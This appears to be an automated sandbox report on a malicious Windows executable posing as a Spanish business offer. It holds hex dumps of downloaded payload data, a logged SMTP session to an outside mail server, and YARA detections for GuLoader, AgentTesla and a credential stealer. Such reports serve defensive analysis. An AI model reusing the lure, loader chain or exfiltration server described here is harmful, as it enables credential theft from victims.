b0 2f 73 55 28 e5 74 5a ed 2e dd 38 e0 5f 90 73 68 fe 1f 29 69 88 96 61 4e cb 50 42 8f fb 67 ed 41 7c 78 de 20 9a 23 56 c2 84 28 33 76 d5 cd 53 b9 9c b3 99 cf 31 e2 b2 e8 a8 5b a6 ac b6 85
                                    Data Ascii: _r>S1 Z7(:8rs/ Xt9SKP&,8i/d!RZ+1Sm` $J4=xywYd4crBIU!c0HRn.;zZqp XeJCR/sU(tZ.8_sh)iaNPBgA|x #V(3vS1[
                                    2021-09-27 16:40:46 UTC203INData Raw: 0f 6b 06 c6 39 53 1d f9 bd a4 9e 3a de 48 7c 29 95 a5 66 78 1b ef 88 53 81 e8 26 59 46 23 ae a3 70 36 f6 f1 ed 27 51 a8 56 6c 92 e9 2a f7 cc 62 e4 7b 20 aa 85 c5 04 a1 48 9d da af 17 c3 b8 f3 7d 5d 5d 3b 3d 93 c0 b8 9b 97 b5 1b a7 16 ee 9a f8 ce b9 de 30 c5 f2 80 43 40 52 e0 05 4d ce d6 3b ad 9e fc e6 a3 27 cd 3e 29 86 bd 93 70 bb 61 9d 67 18 e8 95 0b 0a 96 fc 86 95 87 67 71 1e 9c 90 f5 0d 3a 64 98 5c 48 a0 60 63 1c e9 61 4d 84 ef 43 56 0d 5c 46 d4 f8 0e ec df 6f 39 29 91 15 30 69 f3 6d 9a e7 40 d0 4b 3f f1 a3 cb e0 8b fc 56 88 10 62 e8 e2 18 25 be 07 af fe ea 24 9d b5 aa 13 ee 4f 91 64 e2 4e a9 19 5f d3 c0 3a e9 b3 a2 8d c5 1b 60 c4 0c 71 5c 42 a2 60 a4 9d 0e a4 55 f6 0b 14 90 f9 47 bb c8 0c 55 29 7c 8b 25 da aa ca 48 b0 f4 8a 07 5c 85 7a 5e f8 eb 9e c6
                                    Data Ascii: k9S:H|)fxS&YF#p6'QVl*b{ H}]];=0C@RM;'>)paggq:d\H`caMCV\Fo9)0im@K?Vb%$OdN_:`q\B`UGU)|%H\z^
                                    2021-09-27 16:40:46 UTC204INData Raw: a4 0a e8 43 88 e0 1f 88 14 70 c8 8c fb 14 2d cb d3 66 6b 7d 23 a3 06 82 68 f9 e9 94 04 a7 0a 84 8e 0c 79 16 ea 92 7d 6c 6e 03 eb af bc 06 dd ba 75 f4 82 40 1a ca ad 80 fe 0e 15 6e cc 33 7e fb a7 95 64 21 b3 80 d1 dd f5 90 62 cc fc 2e d7 bd 29 b7 e7 ce b2 35 4e 78 75 43 1b e5 c5 48 5b b7 f8 52 11 f5 2f f4 fc d2 7f 64 11 69 d8 48 9b 97 6f 86 0d 6f 4c 39 fb 70 6b ec 38 b4 1e eb 2b b7 73 1d f0 14 5b 6c 92 f9 5f 2b e4 33 51 83 f9 59 ca 4d 7c 1d 95 2d ee 0f 4b b2 d3 0d 22 6d d7 ec 30 86 96 b8 9e bb 39 f5 c6 f4 8f 4d a2 aa 87 ae c5 42 ec 20 7b 0e 74 76 d4 5e 9c 6e 2d b3 24 37 5b 22 1a e7 f0 f9 15 31 8a 0c b4 9c d6 1f 58 d7 52 31 03 6d 19 be 78 be 1d b8 5d 13 f4 16 83 6e d0 44 41 fa 96 3a 11 18 b1 1a 0e 05 a0 19 66 5b 14 b4 33 e3 cc 56 11 a2 df bc fd 3b e9 68 d3
                                    Data Ascii: Cp-fk}#hy}lnu@n3~d!b.)5NxuCH[R/diHooL9pk8+s[l_+3QYM|-K"m09MB {tv^n-$7["1XR1mx]nDA:f[3V;h
                                    2021-09-27 16:40:46 UTC205INData Raw: 98 f2 d4 99 b6 22 d4 e2 b0 73 5c 3d d7 1a 3e 8d de 5e 9d ae bf cb ad 55 f8 51 6e a4 a6 d0 50 b5 13 ad 08 32 fd 80 30 02 a3 f4 e3 93 86 74 67 2e 96 e2 e7 62 69 7f 84 28 4e a2 4e 53 1a 84 61 50 f7 88 74 57 3c 61 41 df f2 46 c0 de 7e 3b 3e a1 7a 33 69 e4 7b 95 e5 59 b1 63 35 f1 ab ff c8 97 fb 54 ed 22 6e f6 f4 51 38 bd 1c f0 dc fb 3e 88 ae bb 13 c3 71 96 79 83 65 a5 01 5f f7 d6 48 df b4 ae 8c e8 10 74 fb 6d 44 58 5b 91 71 b3 9c 14 cb 74 cf 00 00 9e 8d 7b ac c9 65 79 24 7b 90 23 cb ae c0 48 8d d9 80 09 2f 85 1f 6f fe e4 96 c6 ea ff 75 e6 84 46 d2 49 18 fb 0c a6 ec ec 86 c1 04 41 e3 da 97 54 70 60 86 6f 23 f7 3d 44 1c 95 b3 01 f4 55 ea da 40 f3 8b 8e 6b 31 05 23 5c 8c 95 8a 7b 73 e0 29 1d 83 ce 54 a8 31 3a 59 48 f6 31 af 97 38 01 3c 74 98 b0 70 62 4a a4 34 d9
                                    Data Ascii: "s\=>^UQnP20tg.bi(NNSaPtW<aAF~;>z3i{Yc5T"nQ8>qye_HtmDX[qt{ey${#H/ouFIATp`o#=DU@k1#\{s)T1:YH18<tpbJ4
                                    2021-09-27 16:40:46 UTC207INData Raw: ab 18 ac e1 d2 c6 7c 6c 73 74 71 3d f8 d1 52 40 c5 9f 7a 04 c4 1a fa fa d4 59 65 10 48 ce 22 b9 91 6f 80 0b 7b 53 1f e6 64 71 f7 4a f1 37 ea 1e 91 7e 0d ed 05 29 4f 83 f1 44 45 e4 33 46 8f ff 4c be 60 4d 6f c2 3e ee 24 5c d1 8f 17 31 6d b8 dc 73 b9 80 a6 83 8a 38 e4 b4 ce 8d 5c c3 8a 8a 98 c5 40 fa 0a 7f 1b 69 70 d4 5e 81 65 3a a2 33 06 35 26 0d ea df dd 15 31 fe 5e a2 98 c6 09 66 cc 70 31 71 0a 35 a4 74 83 01 cc 75 08 fe 24 9b 50 c1 65 43 ed e4 0d 1b 1e 9a 52 12 15 a6 46 6d 46 60 92 32 8d e9 49 42 82 de ca de 3a b9 40 d2 d7 45 c3 58 2c 37 06 53 02 47 71 ef 09 4c ff 98 13 2e 8e 51 ae 20 04 b1 97 12 61 06 54 ea 14 50 81 62 db 7c 42 a6 72 c9 d3 d8 6a 55 70 17 d0 f5 cc 20 ed f0 1c 6b 1d 4e b3 ff 69 61 d0 fa cf 35 c4 f5 62 91 3c 92 28 31 a3 9a 33 d3 91 c1 37
                                    Data Ascii: |lstq=R@zYeH"o{SdqJ7~)ODE3FL`Mo>$\1ms8\@ip^e:35&1^fp1q5tu$PeCRFmF`2IB:@EX,7SGqL.Q aTPb|BrjUp kNia5b<(137
                                    2021-09-27 16:40:46 UTC208INData Raw: d2 39 26 69 f1 50 91 c5 46 a2 68 35 e0 a0 dd d0 e5 fd 5c fc 09 59 e1 e0 38 38 ac 1a d6 bd f8 2d 9d 9f 9b 17 d7 40 94 62 96 71 c0 24 4f e4 c9 21 ee a3 cd 8c fc 2a 43 da 79 57 55 5f 80 7c d6 81 17 94 72 d1 00 03 8a 98 78 b7 ce 1c 34 22 70 85 1b de b1 cc 49 8b f3 98 11 5c 85 7a 58 ce fa 80 c6 f1 e4 73 fc 9c 2a c2 5f 06 ff 08 b9 a7 f0 81 c8 14 50 fe e2 8b 27 4a 13 8e 73 23 fe 33 55 3a 9d b0 06 8d 32 cd ed 6d d9 8e 99 4f 31 02 00 2e a4 80 9b 4a 72 eb 5b 3a ae c8 7d aa 2a 0a 59 4f d5 43 89 b7 1c 17 2c 7f fd b0 66 16 72 91 32 e9 fb f2 0b ba b8 19 3d 9d 4c f7 06 20 14 ba b0 4b a3 14 fd 84 99 83 1b b6 d0 cb 06 89 d4 a0 ef 0c b9 4c 1b f8 c4 14 0f c3 95 5a 93 ab 58 a3 b3 ba ba 95 46 d2 be 47 3e 9d 83 70 97 31 81 fc 92 dc 1e 6e 43 75 4d 87 39 91 bb bf dd 97 ac 26 bd
                                    Data Ascii: 9&iPFh5\Y88-@bq$O!*CyWU_|rx4"pI\zXs*_P'Js#3U:2mO1.Jr[:}*YOC,fr2=L KLZXFG>p1nCuM9&
                                    2021-09-27 16:40:46 UTC209INData Raw: aa 1e e5 cd d9 d7 f6 dd d6 52 d5 b0 f5 3a 43 13 f0 6a 71 33 1e 8c 16 7f 09 84 25 15 f2 03 4f e7 41 78 3f 61 6b 9f 8e 9c fa b6 9b de 28 f9 b2 57 3e bf 05 65 72 65 4d d5 23 c2 68 98 13 7b 8d 40 ff 0b a1 17 37 89 98 53 71 6b ec 40 3c 78 d7 19 25 3a 71 f9 53 e4 81 2b 03 66 ad b2 a9 c9 ec 21 ae ad 57 11 3e 4c c2 17 31 47 33 3c 1e 6b 3b ab 98 72 ca eb 0b fe 4f 64 44 82 50 35 77 1f 81 75 22 e4 11 ad 39 31 d9 76 81 a6 a1 06 06 15 74 8f 9d b8 55 8a 8e 65 63 41 23 de bf 0b 00 b5 b7 a8 57 98 fa 02 f3 40 c3 7d 4c b5 fc 56 b2 9d bd 75 fb d5 60 af 7b d2 95 0a 4d 27 72 d5 96 8f 1f 88 e2 bd c5 b2 48 b6 ca ea 87 db bc 02 e9 0c 5b 06 3c 05 0e df 4b 71 81 d4 48 32 59 a7 34 d3 14 56 44 15 6f b5 44 bc 38 b8 48 fb f3 53 bb 05 1d 42 e5 c6 09 1f 66 8e e1 53 d7 93 46 57 2f 4e d6
                                    Data Ascii: R:Cjq3%OAx?ak(W>ereM#h{@7Sqk@<x%:qS+f!W>L1G3<k;rOdDP5wu"91vtUecA#W@}LVu`{M'rH[<KqH2Y4VDoD8HSBfSFW/N
                                    2021-09-27 16:40:46 UTC210INData Raw: 28 43 a4 dd eb 8c 0f 70 17 be 6c 33 8c d6 eb 03 42 e7 e4 b3 a1 8a 70 83 9e 87 5e a3 dd c9 4e 89 a2 b2 fc ab 11 43 20 6b 85 25 a5 35 d0 ea 9e 34 98 40 9d 9b b1 14 16 70 34 3b bb ff fa 15 d1 e2 87 34 4e 08 88 1e 91 cb f4 57 9b 4d 73 59 6b 93 7f 2b 1f 8f 84 44 39 cc 42 4c f8 e6 2a d7 30 67 0f d2 5c f3 72 50 a0 94 7c 28 17 b6 90 3e c5 f7 d8 e5 a6 44 ee d4 de ef 41 d1 b7 f0 83 b2 48 8c 30 19 13 09 6d c6 74 fc 62 5e ae 53 1b 27 28 7a f7 92 e4 68 2a 98 37 c3 94 a0 3f 24 ca 10 2c 63 04 42 b9 39 a3 7d d1 02 13 82 2c e5 82 e4 05 5c 9a ff 4f 29 7e 6f f3 7c 7e c7 08 a5 8d 15 e5 c1 a3 99 a4 28 ef b9 ae 3a d1 e8 3d 21 e3 43 90 36 50 52 87 9d 61 26 3c 1e ff 3f 85 95 75 59 7b 97 df 5a 64 44 d3 57 1b 78 01 87 63 10 65 57 ad 17 3f d0 7b a1 a4 ad 09 02 06 74 91 92 b8 75 89
                                    Data Ascii: (Cpl3Bp^NC k%54@p4;4NWMsYk+D9BL*0g\rP|(>DAH0mtb^S'(zh*7?$,cB9},\O)~o|~(:=!C6PRa&<?uY{ZdDWxceW?{tu
                                    2021-09-27 16:40:46 UTC211INData Raw: e0 37 14 75 51 36 ca 7d 02 6e ec 19 27 8a 86 3b 27 40 97 35 af 92 13 a0 af 0b 4c ce c7 67 51 02 82 4d f3 a1 2d d1 1e 56 87 ce a2 a9 e7 8f 2b 0a 5f 09 8a 89 4c 4e c5 6d a6 ba 9a 55 ec ca c5 73 af 29 f1 0b e0 02 dd 70 32 89 a5 4d 9b c8 4f e6 86 67 84 ae 06 3c 3f 36 f5 18 d3 f3 62 d7 3c af 79 6e ed 79 80 c2 a6 79 25 c4 3c ec 41 b2 de a0 3b e5 87 f0 75 5e ea 02 30 99 8c f2 ae 8f 17 23 86 e3 2a 90 34 f5 1f 63 de 89 a0 e6 b6 64 2a 87 87 72 bb 12 60 c8 0e 5f 9c 6c 29 77 e0 c8 62 fc 22 87 be 11 a8 f5 ea 00 5a 7e 42 35 c5 fe f6 30 08 9b 5c 7d ff 3a dd d4 56 51 34 3e 85 30 f4 ae 71 62 5f 05 f3 de 0d 7f 23 cb 40 82 9e 85 05 fd e7 6d dd 80 33 9f 76 57 08 e4 c0 3f cf 6b 90 ed e3 ef 4e c4 bd af 71 87 9b ce 87 67 f7 3b 7a e5 bc 7a 5a 91 fa 30 68 fa 18 e6 c5 e4 c6 e8 bf
                                    Data Ascii: 7uQ6}n';'@5LgQM-V+_LNmUs)p2MOg<?6b<ynyy%<A;u^0#*4cd*r`_l)wb"Z~B50\}:VQ4>0qb_#@m3vW?kNqg;zzZ0h
                                    2021-09-27 16:40:46 UTC212INData Raw: 9c 63 a8 4d e8 98 23 39 25 f0 2b f8 e6 30 a3 27 1c 9c fb 5c f3 68 24 bc f5 64 41 1a a9 1c f9 d7 e8 54 3a d3 53 a7 c6 a5 7d b9 ce de e1 ff b2 a0 07 58 19 fb 5b 0a da 13 e2 67 4c a8 41 15 35 28 68 f0 80 fe 7a 51 8d 56 df e0 b7 4b 33 bf 10 c7 c4 70 55 c2 42 d8 ee 19 17 5a 92 44 f9 12 26 c6 3e 88 95 40 71 71 eb 4f 64 61 50 c0 37 2f 1d f9 5d e6 95 20 0c e2 b0 a1 be 5a 69 93 b2 ca 58 95 30 5e 41 08 29 62 2e 2b 8c 61 38 9e 8a e1 d2 fb 00 cb 5d f7 5c 96 5a 1b 7e 1e 81 7e 0b e4 12 bb 0b b0 4b 73 8f a9 2c 9a 29 15 58 82 a0 bd 64 88 b1 68 58 45 17 df 84 06 33 b5 81 a6 7e b0 cc 05 b5 48 8f 60 1d d0 aa 33 e5 f4 f3 68 ae b0 2c af 32 c0 ba 0c 06 26 23 c7 be 81 5a 8f a9 a0 87 33 3c a4 19 cf dc d3 ed 22 bc 1d 8c 2f 62 05 54 dd 03 f0 f2 c5 a8 1b 3d a7 57 ce 62 d7 04 1d 09
                                    Data Ascii: cM#9%+0'\h$dAT:S}X[gLA5(hzQVK3pUBZD&>@qqOdaP7/] ZiX0^A)b.+a8]\Z~~Ks,)XdhXE3~H`3h,2&#Z3<"/bT=Wb
                                    2021-09-27 16:40:46 UTC214INData Raw: ed 82 7d 0e ba 8e 7b 31 36 f7 0d d8 e0 76 49 76 b9 65 71 f1 f7 1c d6 be 65 35 46 1d f5 44 af cd a6 2e f9 9e ed 78 52 fe 17 22 99 8d f4 a7 90 98 12 80 ed 3d 96 2d 60 99 ec 4d 88 ad f9 a5 7c 2c 99 98 ef 29 0b 7d ce 0e 52 9c 74 23 7f f0 dd 7c d3 35 84 bb 0d 21 67 ec 1a d5 36 45 4e 4a 69 ff 2a 87 d2 55 6a 6e ab 16 59 4b 4b bf 22 97 b0 a6 d5 10 6d 45 08 ef 42 a2 67 0d c1 52 05 96 8d 2b f2 fd ff 46 c5 38 b8 7f 4b 97 e4 d2 0b d4 79 87 f7 6a 7e 4a d6 3e f3 6a 9b 13 50 82 7b 6b 75 7a e1 bc 77 4d d8 f4 30 87 b6 1a db c2 e4 da 7b 7e a5 ac 7c 53 e7 e4 0a f3 42 fa ad f0 ae 78 17 4b 34 3d 86 7f e7 bc f3 a9 99 e7 41 b3 59 03 ec 70 b3 6d ff e2 bc 75 ae 2a 1a 47 a1 81 45 3a ea 28 5f b7 6f 91 a5 2e bd 01 d0 ff 6c 34 a1 de c3 f3 8e 4f 24 28 4d f9 88 17 a4 40 7c d3 c4 e4 23
                                    Data Ascii: }{16vIveqe5FD.xR"=-`M|,)}Rt#|5!g6ENJi*UjnYKK"mEBgR+F8Kyj~J>jP{kuzwM0{~|SBxK4=AYpmu*GE:(_o.l4O$(M@|#
                                    2021-09-27 16:40:46 UTC215INData Raw: c4 31 63 5e c2 aa 8a 61 ad 01 f8 21 47 f9 16 b6 95 3c 8a 98 53 61 7d 6c e3 63 7e dc 10 23 2d 1a e5 c1 7e 80 2d 19 e1 8c bd a9 c9 74 2c aa a4 43 98 2a 5b 5e 03 3a 6f 3b 28 9f 64 38 96 9d 68 02 fd 19 cb 5d f7 5c 96 46 94 36 16 9d f7 9b e5 01 2f 59 24 c0 f3 18 a6 b9 08 83 51 76 8c 9e b3 40 9a 02 f1 6a 50 31 5e f5 05 0b bb b8 ae 5b b5 e9 17 99 54 df e1 1e d8 f3 3d bc fa a9 75 ec ac 76 2e 3b c8 f8 04 50 28 72 db fe 94 06 0e 7f a1 c2 21 ec e0 48 c1 81 dd b1 37 fb 9c 9e 2c 3b 0b 02 ce 5d f9 ba 47 fc 15 4d 24 09 d3 03 ca 64 00 6a bc 4b 38 15 a0 e9 d3 ff 49 bc 03 1b 59 e0 cc 1c 16 6c 8e f4 2a dd 8f 21 5f 21 47 c8 85 2e 47 8c 9d a4 50 51 f0 2b 98 b9 e7 4a 97 a6 3d a5 92 7c de 72 c3 73 b1 12 f2 ab e1 16 a5 cf 04 73 1a 11 4e 6a e4 39 29 f3 f0 da 1a ea 79 90 f4 ba bd
                                    Data Ascii: 1c^a!G<Sa}lc~#-~-t,C*[^:o;(d8h]\F6/Y$Qv@jP1^[T=uv.;P(r!H7,;]GM$djK8IYl*!_!G.GPQ+J=|rssNj9)y
                                    2021-09-27 16:40:46 UTC216INData Raw: 72 f5 39 9e 2d 9e a6 fe ec 0f 45 f5 d1 57 cb f2 ec ba 03 80 d9 7d ff 38 01 de 43 48 bc 97 81 31 e7 cc 65 7c 5f 12 ff c8 1f 6a 25 dc 51 06 27 83 17 f9 f3 76 55 d1 36 9f 79 51 1c f1 d4 26 ce 67 12 4d ef fa 5a 44 1b b7 7f 88 9c c2 87 49 eb 37 63 98 a6 74 42 ad f2 20 e2 a3 03 ce da e9 c0 e7 22 b6 a2 08 59 f2 ed 04 e6 4b f6 a4 e8 bb 63 37 41 39 3f 89 70 ec bd e7 ba 99 f4 52 b5 5f 03 f8 79 b8 7a fd f9 a4 69 20 d5 38 5d b8 9c 75 bc 78 3c 5f b7 b6 88 b9 b3 ef 79 ca 70 e8 30 a1 de c3 e6 92 2c 2a a6 eb 76 d5 00 c5 40 73 b4 de 78 8c 2e e3 9c 52 ff 46 1d bb 94 ba 73 48 af a9 2e 17 1a 41 d6 77 76 99 82 bb f9 77 b6 da 70 eb df 9e 75 81 f7 1d 18 2b 71 98 c0 ce 06 8e d5 1a 9e e7 37 5f b8 df ed 8c 0e 72 0b b8 62 30 88 c2 e5 81 e7 f9 ed a2 bc 85 f4 1e 97 8f 59 bb de c9 f7
                                    Data Ascii: r9-EW}8CH1e|_j%Q'vU6yQ&gMZDI7ctB "YKc7A9?pR_yzi 8]ux<_yp0,*v@sx.RFsH.Awvwpu+q7_rb0Y
                                    2021-09-27 16:40:46 UTC217INData Raw: 14 a9 1b 3f d0 6e 9c bb b1 06 1f 17 72 82 92 bc 5b 99 02 51 6c 65 21 dd a3 86 e9 bb bf 86 44 b2 e7 85 18 5a 4d b5 52 d7 e8 2e a5 fe b7 7a 69 65 79 aa 73 c7 d0 0e 47 2c 7e 44 22 8b 34 8c e7 b2 57 e6 7c 27 92 cd 8a d3 bb 28 e3 17 dd 28 36 07 0e cf db c5 a1 e5 cb 19 4d 27 d8 de 1b d2 7a 1a 68 a1 44 bc 84 ab db 56 1b 56 b7 05 01 c4 01 d6 94 fd 7d 91 67 f6 d2 8f c8 b5 29 53 cb 7d 96 43 96 1d 4a 4d 28 ee 3b 0b ee 69 a9 87 aa bc 2e 12 5b 4c 1d 86 66 dd 11 f7 aa c6 1e ac d9 a7 23 15 38 41 71 f1 a4 f9 e6 61 ae 06 f1 7e 87 ec 98 b2 ef b6 44 ac 93 e8 31 2e 53 bf 6f 44 8b 99 3a e8 e3 7c 4f c3 20 8c 4c 2c dc d7 81 b9 a1 7c db 0f 68 9d fc 7d 68 c0 9a 8e d2 c8 16 01 40 f8 97 91 68 27 03 e5 dd 5e d2 65 0f 76 e9 05 3f 81 82 23 02 50 14 22 b8 99 09 ac af 0b 56 5e 52 af 5e
                                    Data Ascii: ?nr[Qle!DZMR.zieysG,~D"4W|'((6M'zhDVV}g)S}CJM(;i.[Lf#8Aqa~D1.SoD:|O L,|h}h@h'^ev?#P"V^R^
                                    2021-09-27 16:40:46 UTC219INData Raw: 28 74 91 bd 64 43 ac ff 2a ee ad 0d 42 c6 ef c8 fa 2c 2f bf 13 5c f8 f7 06 f1 2a f2 8c e3 ae 63 0a 46 2a 32 9a 7f e1 bc fd ba 92 f4 59 b3 5f 03 f9 74 bb 64 fd ea b0 ff a5 36 96 53 a4 8e 61 33 f3 bc d0 33 fe 8d b2 a7 f5 13 c1 63 f0 28 b6 4d ea e6 87 42 25 23 4d fc c5 0d c5 4f 62 c0 d3 77 00 37 e3 8d 5d f6 7b 1a a7 89 a5 7d 55 af bc 33 04 17 54 c3 78 f3 30 8e 86 fe 7e b5 30 ed fa 58 16 7c 9d f2 03 1d 36 74 84 c5 dc 01 89 c8 13 82 e2 29 5a a5 da fd 0d 1e 60 8f a9 7e 59 80 ca f2 1c 56 ea e0 af b1 85 f4 13 9a 84 5b e3 c8 6e de 8d a1 b7 61 0e 0a 12 af 7e 8a a1 21 31 d9 ea 9f d0 89 ce 33 8b 3e 12 16 79 3a a6 3e e2 e8 09 aa 71 9b 21 4e 09 ed 03 91 cb bc 44 8b 4d 73 15 7a 1c 79 27 10 e3 8a 3f 42 b8 4c 38 f6 92 24 a3 3e 13 01 a6 52 87 62 2c a3 7c cb 40 0c a9 1d cd
                                    Data Ascii: (tdC*B,/\*cF*2Y_td6Sa33c(MB%#MObw7]{}U3Tx0~0X|6t)Z`~YV[na~!13>y:>q!NDMszy'?BL8$>Rb,|@
                                    2021-09-27 16:40:46 UTC220INData Raw: 04 0c dc 5a f0 a8 ad c9 1b df a7 34 ce 06 d7 61 1d 6f b4 56 3d 1d aa c9 d7 f7 54 b9 0b 13 c4 e5 c4 14 11 68 80 e6 53 d3 9d 48 59 21 46 da fc 33 43 84 9d a6 42 28 7c 39 1b fc 49 cd 91 b8 89 b5 13 49 cc f1 8e 61 d8 0c f2 ad 99 94 a7 dd 6d 23 1c 31 4f 76 f6 b9 fc f4 e0 db af f6 4d 8d f1 9d ec ea e5 45 ee 96 b9 34 6b 52 f0 6a 1e 8d f0 3b a6 f1 b2 a3 93 27 c2 51 67 c1 94 93 77 d4 61 de 08 75 25 f0 96 91 c2 93 87 d6 e8 17 08 4a f3 90 94 62 3a 06 f7 5c 2b cf 60 07 4c e9 04 22 84 88 26 22 56 15 28 b2 96 0e a5 b2 0e 5e 4c d2 7a 54 0c 90 24 f4 81 2f 94 0d 56 94 ce af ff e5 fb 39 fa 56 4d 84 ee 51 27 d8 0d af f4 9f 26 e9 a6 d8 19 a7 21 f7 0b e2 2c c0 71 3a 85 a5 1c 9a a8 cd 82 8c 1b 06 d8 0c 5a 39 57 f4 71 d6 87 67 a4 3b d1 65 72 ff f9 14 de ba d5 30 51 17 f1 44 af
                                    Data Ascii: Z4aoV=ThSHY!F3CB(|9IIam#1OvME4kRj;'Qgwau%Jb:\+`L"&"V(^LzT$/V9VMQ'&!,q:Z9Wqg;er0QD
                                    2021-09-27 16:40:46 UTC221INData Raw: 5f 83 ee 80 41 38 26 5f 78 c8 05 cd 48 61 dd d6 65 82 26 eb 94 5a fa 66 1f ba 8c b8 78 48 aa a1 36 19 12 49 c6 65 f6 2d 8b 9b fb 76 a7 59 e1 fa 5c 0b 79 80 f7 1e 18 2b 71 99 c0 ce 06 8e d5 16 9f e7 34 5f b8 df ef 8c 0e 72 0b b8 6c 30 8e ca f7 01 53 f7 e5 b2 b4 98 f1 0e 9f 99 5e b6 cf 48 c3 88 bc b2 7c 0b 16 00 2e 7e 97 a4 3c 34 c5 f8 1f 70 9b 4e 93 99 bf 1a 0a 65 26 ba 22 fe f4 1b c3 63 1a 21 5c 89 11 1f 83 4a b4 59 8e 5f f2 1d 68 9d 71 29 0d e6 96 2d 2b a5 50 25 ea 8f 38 be 22 0e 1d cb 4d 9a 6c 39 b2 fd 2e 77 19 b8 9e 30 cb f9 d6 f7 cf 56 87 c6 b7 fd 28 c3 de e2 ea a0 21 9e 59 0b 7a 1b 04 d4 1d ee 0b 4c c7 41 72 35 41 68 9e 80 8d 7a 43 8a 5e d1 fd b2 56 36 a3 02 45 71 6d 50 d0 2b ca 6f b8 10 7a 90 45 f7 03 a4 17 35 88 96 5d 74 6c ee 52 61 70 d2 19 24 28
                                    Data Ascii: _A8&_xHae&ZfxH6Ie-vY\y+q4_rl0S^H|.~<4pNe&"c!\JY_hq)-+P%8"Ml9.w0V(!YzLAr5AhzC^V6EqmP+ozE5]tlRap$(


                                    SMTP Packets

                                    TimestampSource PortDest PortSource IPDest IPCommands
                                    Sep 27, 2021 18:42:22.633618116 CEST58749807185.156.219.141192.168.11.20220-host.cpse57.eu ESMTP Exim 4.94.2 #2 Mon, 27 Sep 2021 18:42:22 +0200
                                    220-We do not authorize the use of this system to transport unsolicited,
                                    220 and/or bulk e-mail.
                                    Sep 27, 2021 18:42:22.634032011 CEST49807587192.168.11.20185.156.219.141EHLO 932923
                                    Sep 27, 2021 18:42:22.671026945 CEST58749807185.156.219.141192.168.11.20250-host.cpse57.eu Hello 932923 [84.17.52.54]
                                    250-SIZE 52428800
                                    250-8BITMIME
                                    250-PIPELINING
                                    250-PIPE_CONNECT
                                    250-AUTH PLAIN LOGIN
                                    250-STARTTLS
                                    250 HELP
                                    Sep 27, 2021 18:42:22.671422005 CEST49807587192.168.11.20185.156.219.141STARTTLS
                                    Sep 27, 2021 18:42:22.712703943 CEST58749807185.156.219.141192.168.11.20220 TLS go ahead

                                    Code Manipulations

                                    Statistics

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Start time:18:39:46
                                    Start date:27/09/2021
                                    Path:C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exe
                                    Wow64 process (32bit):true
                                    Commandline:'C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exe'
                                    Imagebase:0x400000
                                    File size:102400 bytes
                                    MD5 hash:991BEE5A9EDD18A183C900B7EDECCEFE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:Visual Basic
                                    Yara matches:
                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.34336278917.00000000023C0000.00000040.00000001.sdmp, Author: Joe Security
                                    Reputation:low

                                    General

                                    Start time:18:40:18
                                    Start date:27/09/2021
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                    Wow64 process (32bit):true
                                    Commandline:'C:\Users\user\Desktop\GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exe'
                                    Imagebase:0x6d0000
                                    File size:65440 bytes
                                    MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.38792666858.000000001DC01000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.38792666858.000000001DC01000.00000004.00000001.sdmp, Author: Joe Security
                                    Reputation:low

                                    General

                                    Start time:18:40:18
                                    Start date:27/09/2021
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff692ab0000
                                    File size:875008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate

                                    Disassembly

                                    Code Analysis

                                    Reset < >